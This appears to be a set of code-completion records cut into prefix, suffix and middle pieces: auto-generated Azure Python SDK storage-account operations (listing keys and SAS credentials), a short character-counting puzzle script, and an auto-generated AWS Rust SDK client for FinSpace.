401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-10-01"
accept = "application/json, text/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('StorageAccountListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts'} # type: ignore
async def list_keys(
self,
resource_group_name: str,
account_name: str,
**kwargs: Any
) -> "_models.StorageAccountListKeysResult":
"""Lists the access keys for the specified storage account.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StorageAccountListKeysResult, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2017_10_01.models.StorageAccountListKeysResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageAccountListKeysResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-10-01"
accept = "application/json, text/json"
# Construct URL
url = self.list_keys.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('StorageAccountListKeysResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_keys.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/listKeys'} # type: ignore
async def regenerate_key(
self,
resource_group_name: str,
account_name: str,
regenerate_key: "_models.StorageAccountRegenerateKeyParameters",
**kwargs: Any
) -> "_models.StorageAccountListKeysResult":
"""Regenerates one of the access keys for the specified storage account.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:param regenerate_key: Specifies name of the key which should be regenerated -- key1 or key2.
:type regenerate_key: ~azure.mgmt.storage.v2017_10_01.models.StorageAccountRegenerateKeyParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StorageAccountListKeysResult, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2017_10_01.models.StorageAccountListKeysResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageAccountListKeysResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json, text/json"
# Construct URL
url = self.regenerate_key.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(regenerate_key, 'StorageAccountRegenerateKeyParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('StorageAccountListKeysResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
regenerate_key.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/regenerateKey'} # type: ignore
async def list_account_sas(
self,
resource_group_name: str,
account_name: str,
parameters: "_models.AccountSasParameters",
**kwargs: Any
) -> "_models.ListAccountSasResponse":
"""List SAS credentials of a storage account.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:param parameters: The parameters to provide to list SAS credentials for the storage account.
:type parameters: ~azure.mgmt.storage.v2017_10_01.models.AccountSasParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ListAccountSasResponse, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2017_10_01.models.ListAccountSasResponse
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListAccountSasResponse"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json, text/json"
# Construct URL
url = self.list_account_sas.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'AccountSasParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ListAccountSasResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_account_sas.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/ListAccountSas'} # type: ignore
async def list_service_sas(
self,
resource_group_name: str,
account_name: str,
parameters: "_models.ServiceSasParameters",
**kwargs: Any
) -> "_models.ListServiceSasResponse":
"""List service SAS credentials of a specific resource.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:param parameters: The parameters to provide to list service SAS credentials.
:type parameters: ~azure.mgmt.storage.v2017_10_01.models.ServiceSasParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ListServiceSasResponse, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2017_10_01.models.ListServiceSasResponse
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListServiceSasResponse"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json, text/json"
# Construct URL
url = self.list_service_sas.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'ServiceSasParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ListServiceSasResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_service_sas.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/ListServiceSas'} # type: ignore
|
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
|
day2_part1.py
|
#!/usr/bin/env python3
import sys
def
|
(text):
chars = {}
for char in text:
if char not in chars:
chars[char] = 0
chars[char] += 1
counts = [False, False, False, False]
for count in chars.values():
if count < len(counts):
counts[count] = True
return counts
letter_two_times = 0
letter_three_times = 0
for line in sys.stdin:
counts = count_characters(line)
letter_two_times = letter_two_times + 1 if counts[2] else letter_two_times
letter_three_times = letter_three_times + 1 if counts[3] else letter_three_times
print(letter_two_times * letter_three_times)
|
count_characters
|
client.rs
|
// Code generated by software.amazon.smithy.rust.codegen.smithy-rs. DO NOT EDIT.
#[derive(Debug)]
pub(crate) struct Handle {
pub(crate) client: aws_smithy_client::Client<
aws_smithy_client::erase::DynConnector,
aws_smithy_client::erase::DynMiddleware<aws_smithy_client::erase::DynConnector>,
>,
pub(crate) conf: crate::Config,
}
/// Client for FinSpace User Environment Management service
///
/// Client for invoking operations on FinSpace User Environment Management service. Each operation on FinSpace User Environment Management service is a method on this
/// this struct. `.send()` MUST be invoked on the generated operations to dispatch the request to the service.
///
/// # Examples
/// **Constructing a client and invoking an operation**
/// ```rust,no_run
/// # async fn docs() {
/// // create a shared configuration. This can be used & shared between multiple service clients.
/// let shared_config = aws_config::load_from_env().await;
/// let client = aws_sdk_finspace::Client::new(&shared_config);
/// // invoke an operation
/// /* let rsp = client
/// .<operation_name>().
/// .<param>("some value")
/// .send().await; */
/// # }
/// ```
/// **Constructing a client with custom configuration**
/// ```rust,no_run
/// use aws_config::RetryConfig;
/// # async fn docs() {
/// let shared_config = aws_config::load_from_env().await;
/// let config = aws_sdk_finspace::config::Builder::from(&shared_config)
/// .retry_config(RetryConfig::disabled())
/// .build();
/// let client = aws_sdk_finspace::Client::from_conf(config);
/// # }
#[derive(std::fmt::Debug)]
pub struct Client {
handle: std::sync::Arc<Handle>,
}
impl std::clone::Clone for Client {
fn clone(&self) -> Self {
Self {
handle: self.handle.clone(),
}
}
}
#[doc(inline)]
pub use aws_smithy_client::Builder;
impl
From<
aws_smithy_client::Client<
aws_smithy_client::erase::DynConnector,
aws_smithy_client::erase::DynMiddleware<aws_smithy_client::erase::DynConnector>,
>,
> for Client
{
fn from(
client: aws_smithy_client::Client<
aws_smithy_client::erase::DynConnector,
aws_smithy_client::erase::DynMiddleware<aws_smithy_client::erase::DynConnector>,
>,
) -> Self {
Self::with_config(client, crate::Config::builder().build())
}
}
impl Client {
/// Creates a client with the given service configuration.
pub fn
|
(
client: aws_smithy_client::Client<
aws_smithy_client::erase::DynConnector,
aws_smithy_client::erase::DynMiddleware<aws_smithy_client::erase::DynConnector>,
>,
conf: crate::Config,
) -> Self {
Self {
handle: std::sync::Arc::new(Handle { client, conf }),
}
}
/// Returns the client's configuration.
pub fn conf(&self) -> &crate::Config {
&self.handle.conf
}
}
impl Client {
/// Constructs a fluent builder for the [`CreateEnvironment`](crate::client::fluent_builders::CreateEnvironment) operation.
///
/// - The fluent builder is configurable:
/// - [`name(impl Into<String>)`](crate::client::fluent_builders::CreateEnvironment::name) / [`set_name(Option<String>)`](crate::client::fluent_builders::CreateEnvironment::set_name): <p>The name of the FinSpace environment to be created.</p>
/// - [`description(impl Into<String>)`](crate::client::fluent_builders::CreateEnvironment::description) / [`set_description(Option<String>)`](crate::client::fluent_builders::CreateEnvironment::set_description): <p>The description of the FinSpace environment to be created.</p>
/// - [`kms_key_id(impl Into<String>)`](crate::client::fluent_builders::CreateEnvironment::kms_key_id) / [`set_kms_key_id(Option<String>)`](crate::client::fluent_builders::CreateEnvironment::set_kms_key_id): <p>The KMS key id to encrypt your data in the FinSpace environment.</p>
/// - [`tags(HashMap<String, String>)`](crate::client::fluent_builders::CreateEnvironment::tags) / [`set_tags(Option<HashMap<String, String>>)`](crate::client::fluent_builders::CreateEnvironment::set_tags): <p>Add tags to your FinSpace environment.</p>
/// - [`federation_mode(FederationMode)`](crate::client::fluent_builders::CreateEnvironment::federation_mode) / [`set_federation_mode(Option<FederationMode>)`](crate::client::fluent_builders::CreateEnvironment::set_federation_mode): <p>Authentication mode for the environment.</p> <ul> <li> <p> <code>FEDERATED</code> - Users access FinSpace through Single Sign On (SSO) via your Identity provider.</p> </li> <li> <p> <code>LOCAL</code> - Users access FinSpace via email and password managed within the FinSpace environment.</p> </li> </ul>
/// - [`federation_parameters(FederationParameters)`](crate::client::fluent_builders::CreateEnvironment::federation_parameters) / [`set_federation_parameters(Option<FederationParameters>)`](crate::client::fluent_builders::CreateEnvironment::set_federation_parameters): <p>Configuration information when authentication mode is FEDERATED.</p>
/// - [`superuser_parameters(SuperuserParameters)`](crate::client::fluent_builders::CreateEnvironment::superuser_parameters) / [`set_superuser_parameters(Option<SuperuserParameters>)`](crate::client::fluent_builders::CreateEnvironment::set_superuser_parameters): <p>Configuration information for the superuser.</p>
/// - [`data_bundles(Vec<String>)`](crate::client::fluent_builders::CreateEnvironment::data_bundles) / [`set_data_bundles(Option<Vec<String>>)`](crate::client::fluent_builders::CreateEnvironment::set_data_bundles): <p>The list of Amazon Resource Names (ARN) of the data bundles to install. Currently supported data bundle ARNs:</p> <ul> <li> <p> <code>arn:aws:finspace:${Region}::data-bundle/capital-markets-sample</code> - Contains sample Capital Markets datasets, categories and controlled vocabularies.</p> </li> <li> <p> <code>arn:aws:finspace:${Region}::data-bundle/taq</code> (default) - Contains trades and quotes data in addition to sample Capital Markets data.</p> </li> </ul>
/// - On success, responds with [`CreateEnvironmentOutput`](crate::output::CreateEnvironmentOutput) with field(s):
/// - [`environment_id(Option<String>)`](crate::output::CreateEnvironmentOutput::environment_id): <p>The unique identifier for FinSpace environment that you created.</p>
/// - [`environment_arn(Option<String>)`](crate::output::CreateEnvironmentOutput::environment_arn): <p>The Amazon Resource Name (ARN) of the FinSpace environment that you created.</p>
/// - [`environment_url(Option<String>)`](crate::output::CreateEnvironmentOutput::environment_url): <p>The sign-in url for the web application of the FinSpace environment you created.</p>
/// - On failure, responds with [`SdkError<CreateEnvironmentError>`](crate::error::CreateEnvironmentError)
pub fn create_environment(&self) -> fluent_builders::CreateEnvironment {
fluent_builders::CreateEnvironment::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`DeleteEnvironment`](crate::client::fluent_builders::DeleteEnvironment) operation.
///
/// - The fluent builder is configurable:
/// - [`environment_id(impl Into<String>)`](crate::client::fluent_builders::DeleteEnvironment::environment_id) / [`set_environment_id(Option<String>)`](crate::client::fluent_builders::DeleteEnvironment::set_environment_id): <p>The identifier for the FinSpace environment.</p>
/// - On success, responds with [`DeleteEnvironmentOutput`](crate::output::DeleteEnvironmentOutput)
/// - On failure, responds with [`SdkError<DeleteEnvironmentError>`](crate::error::DeleteEnvironmentError)
pub fn delete_environment(&self) -> fluent_builders::DeleteEnvironment {
fluent_builders::DeleteEnvironment::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`GetEnvironment`](crate::client::fluent_builders::GetEnvironment) operation.
///
/// - The fluent builder is configurable:
/// - [`environment_id(impl Into<String>)`](crate::client::fluent_builders::GetEnvironment::environment_id) / [`set_environment_id(Option<String>)`](crate::client::fluent_builders::GetEnvironment::set_environment_id): <p>The identifier of the FinSpace environment.</p>
/// - On success, responds with [`GetEnvironmentOutput`](crate::output::GetEnvironmentOutput) with field(s):
/// - [`environment(Option<Environment>)`](crate::output::GetEnvironmentOutput::environment): <p>The name of the FinSpace environment.</p>
/// - On failure, responds with [`SdkError<GetEnvironmentError>`](crate::error::GetEnvironmentError)
pub fn get_environment(&self) -> fluent_builders::GetEnvironment {
fluent_builders::GetEnvironment::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`ListEnvironments`](crate::client::fluent_builders::ListEnvironments) operation.
///
/// - The fluent builder is configurable:
/// - [`next_token(impl Into<String>)`](crate::client::fluent_builders::ListEnvironments::next_token) / [`set_next_token(Option<String>)`](crate::client::fluent_builders::ListEnvironments::set_next_token): <p>A token generated by FinSpace that specifies where to continue pagination if a previous request was truncated. To get the next set of pages, pass in the nextToken value from the response object of the previous page call.</p>
/// - [`max_results(i32)`](crate::client::fluent_builders::ListEnvironments::max_results) / [`set_max_results(i32)`](crate::client::fluent_builders::ListEnvironments::set_max_results): <p>The maximum number of results to return in this request.</p>
/// - On success, responds with [`ListEnvironmentsOutput`](crate::output::ListEnvironmentsOutput) with field(s):
/// - [`environments(Option<Vec<Environment>>)`](crate::output::ListEnvironmentsOutput::environments): <p>A list of all of your FinSpace environments.</p>
/// - [`next_token(Option<String>)`](crate::output::ListEnvironmentsOutput::next_token): <p>A token that you can use in a subsequent call to retrieve the next set of results.</p>
/// - On failure, responds with [`SdkError<ListEnvironmentsError>`](crate::error::ListEnvironmentsError)
pub fn list_environments(&self) -> fluent_builders::ListEnvironments {
fluent_builders::ListEnvironments::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`ListTagsForResource`](crate::client::fluent_builders::ListTagsForResource) operation.
///
/// - The fluent builder is configurable:
/// - [`resource_arn(impl Into<String>)`](crate::client::fluent_builders::ListTagsForResource::resource_arn) / [`set_resource_arn(Option<String>)`](crate::client::fluent_builders::ListTagsForResource::set_resource_arn): <p>The Amazon Resource Name of the resource.</p>
/// - On success, responds with [`ListTagsForResourceOutput`](crate::output::ListTagsForResourceOutput) with field(s):
/// - [`tags(Option<HashMap<String, String>>)`](crate::output::ListTagsForResourceOutput::tags): <p>A list of all tags for a resource.</p>
/// - On failure, responds with [`SdkError<ListTagsForResourceError>`](crate::error::ListTagsForResourceError)
pub fn list_tags_for_resource(&self) -> fluent_builders::ListTagsForResource {
fluent_builders::ListTagsForResource::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`TagResource`](crate::client::fluent_builders::TagResource) operation.
///
/// - The fluent builder is configurable:
/// - [`resource_arn(impl Into<String>)`](crate::client::fluent_builders::TagResource::resource_arn) / [`set_resource_arn(Option<String>)`](crate::client::fluent_builders::TagResource::set_resource_arn): <p>The Amazon Resource Name (ARN) for the resource.</p>
/// - [`tags(HashMap<String, String>)`](crate::client::fluent_builders::TagResource::tags) / [`set_tags(Option<HashMap<String, String>>)`](crate::client::fluent_builders::TagResource::set_tags): <p>One or more tags to be assigned to the resource.</p>
/// - On success, responds with [`TagResourceOutput`](crate::output::TagResourceOutput)
/// - On failure, responds with [`SdkError<TagResourceError>`](crate::error::TagResourceError)
pub fn tag_resource(&self) -> fluent_builders::TagResource {
fluent_builders::TagResource::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`UntagResource`](crate::client::fluent_builders::UntagResource) operation.
///
/// - The fluent builder is configurable:
/// - [`resource_arn(impl Into<String>)`](crate::client::fluent_builders::UntagResource::resource_arn) / [`set_resource_arn(Option<String>)`](crate::client::fluent_builders::UntagResource::set_resource_arn): <p>A FinSpace resource from which you want to remove a tag or tags. The value for this parameter is an Amazon Resource Name (ARN).</p>
/// - [`tag_keys(Vec<String>)`](crate::client::fluent_builders::UntagResource::tag_keys) / [`set_tag_keys(Option<Vec<String>>)`](crate::client::fluent_builders::UntagResource::set_tag_keys): <p>The tag keys (names) of one or more tags to be removed.</p>
/// - On success, responds with [`UntagResourceOutput`](crate::output::UntagResourceOutput)
/// - On failure, responds with [`SdkError<UntagResourceError>`](crate::error::UntagResourceError)
pub fn untag_resource(&self) -> fluent_builders::UntagResource {
fluent_builders::UntagResource::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`UpdateEnvironment`](crate::client::fluent_builders::UpdateEnvironment) operation.
///
/// - The fluent builder is configurable:
/// - [`environment_id(impl Into<String>)`](crate::client::fluent_builders::UpdateEnvironment::environment_id) / [`set_environment_id(Option<String>)`](crate::client::fluent_builders::UpdateEnvironment::set_environment_id): <p>The identifier of the FinSpace environment.</p>
/// - [`name(impl Into<String>)`](crate::client::fluent_builders::UpdateEnvironment::name) / [`set_name(Option<String>)`](crate::client::fluent_builders::UpdateEnvironment::set_name): <p>The name of the environment.</p>
/// - [`description(impl Into<String>)`](crate::client::fluent_builders::UpdateEnvironment::description) / [`set_description(Option<String>)`](crate::client::fluent_builders::UpdateEnvironment::set_description): <p>The description of the environment.</p>
/// - [`federation_mode(FederationMode)`](crate::client::fluent_builders::UpdateEnvironment::federation_mode) / [`set_federation_mode(Option<FederationMode>)`](crate::client::fluent_builders::UpdateEnvironment::set_federation_mode): <p>Authentication mode for the environment.</p> <ul> <li> <p> <code>FEDERATED</code> - Users access FinSpace through Single Sign On (SSO) via your Identity provider.</p> </li> <li> <p> <code>LOCAL</code> - Users access FinSpace via email and password managed within the FinSpace environment.</p> </li> </ul>
/// - [`federation_parameters(FederationParameters)`](crate::client::fluent_builders::UpdateEnvironment::federation_parameters) / [`set_federation_parameters(Option<FederationParameters>)`](crate::client::fluent_builders::UpdateEnvironment::set_federation_parameters): <p>Configuration information when authentication mode is FEDERATED.</p>
/// - On success, responds with [`UpdateEnvironmentOutput`](crate::output::UpdateEnvironmentOutput) with field(s):
/// - [`environment(Option<Environment>)`](crate::output::UpdateEnvironmentOutput::environment): <p>Returns the FinSpace environment object.</p>
/// - On failure, responds with [`SdkError<UpdateEnvironmentError>`](crate::error::UpdateEnvironmentError)
pub fn update_environment(&self) -> fluent_builders::UpdateEnvironment {
fluent_builders::UpdateEnvironment::new(self.handle.clone())
}
}
pub mod fluent_builders {
//!
//! Utilities to ergonomically construct a request to the service.
//!
//! Fluent builders are created through the [`Client`](crate::client::Client) by calling
//! one if its operation methods. After parameters are set using the builder methods,
//! the `send` method can be called to initiate the request.
//!
/// Fluent builder constructing a request to `CreateEnvironment`.
///
/// <p>Create a new FinSpace environment.</p>
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct CreateEnvironment {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::create_environment_input::Builder,
}
impl CreateEnvironment {
/// Creates a new `CreateEnvironment`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::CreateEnvironmentOutput,
aws_smithy_http::result::SdkError<crate::error::CreateEnvironmentError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// <p>The name of the FinSpace environment to be created.</p>
pub fn name(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.name(input.into());
self
}
/// <p>The name of the FinSpace environment to be created.</p>
pub fn set_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_name(input);
self
}
/// <p>The description of the FinSpace environment to be created.</p>
pub fn description(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.description(input.into());
self
}
/// <p>The description of the FinSpace environment to be created.</p>
pub fn set_description(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_description(input);
self
}
/// <p>The KMS key id to encrypt your data in the FinSpace environment.</p>
pub fn kms_key_id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.kms_key_id(input.into());
self
}
/// <p>The KMS key id to encrypt your data in the FinSpace environment.</p>
pub fn set_kms_key_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_kms_key_id(input);
self
}
/// Adds a key-value pair to `tags`.
///
/// To override the contents of this collection use [`set_tags`](Self::set_tags).
///
/// <p>Add tags to your FinSpace environment.</p>
pub fn tags(
mut self,
k: impl Into<std::string::String>,
v: impl Into<std::string::String>,
) -> Self {
self.inner = self.inner.tags(k.into(), v.into());
self
}
/// <p>Add tags to your FinSpace environment.</p>
pub fn set_tags(
mut self,
input: std::option::Option<
std::collections::HashMap<std::string::String, std::string::String>,
>,
) -> Self {
self.inner = self.inner.set_tags(input);
self
}
/// <p>Authentication mode for the environment.</p>
/// <ul>
/// <li> <p> <code>FEDERATED</code> - Users access FinSpace through Single Sign On (SSO) via your Identity provider.</p> </li>
/// <li> <p> <code>LOCAL</code> - Users access FinSpace via email and password managed within the FinSpace environment.</p> </li>
/// </ul>
pub fn federation_mode(mut self, input: crate::model::FederationMode) -> Self {
self.inner = self.inner.federation_mode(input);
self
}
/// <p>Authentication mode for the environment.</p>
/// <ul>
/// <li> <p> <code>FEDERATED</code> - Users access FinSpace through Single Sign On (SSO) via your Identity provider.</p> </li>
/// <li> <p> <code>LOCAL</code> - Users access FinSpace via email and password managed within the FinSpace environment.</p> </li>
/// </ul>
pub fn set_federation_mode(
mut self,
input: std::option::Option<crate::model::FederationMode>,
) -> Self {
self.inner = self.inner.set_federation_mode(input);
self
}
/// <p>Configuration information when authentication mode is FEDERATED.</p>
pub fn federation_parameters(mut self, input: crate::model::FederationParameters) -> Self {
self.inner = self.inner.federation_parameters(input);
self
}
/// <p>Configuration information when authentication mode is FEDERATED.</p>
pub fn set_federation_parameters(
mut self,
input: std::option::Option<crate::model::FederationParameters>,
) -> Self {
self.inner = self.inner.set_federation_parameters(input);
self
}
/// <p>Configuration information for the superuser.</p>
pub fn superuser_parameters(mut self, input: crate::model::SuperuserParameters) -> Self {
self.inner = self.inner.superuser_parameters(input);
self
}
/// <p>Configuration information for the superuser.</p>
pub fn set_superuser_parameters(
mut self,
input: std::option::Option<crate::model::SuperuserParameters>,
) -> Self {
self.inner = self.inner.set_superuser_parameters(input);
self
}
/// Appends an item to `dataBundles`.
///
/// To override the contents of this collection use [`set_data_bundles`](Self::set_data_bundles).
///
/// <p>The list of Amazon Resource Names (ARN) of the data bundles to install. Currently supported data bundle ARNs:</p>
/// <ul>
/// <li> <p> <code>arn:aws:finspace:${Region}::data-bundle/capital-markets-sample</code> - Contains sample Capital Markets datasets, categories and controlled vocabularies.</p> </li>
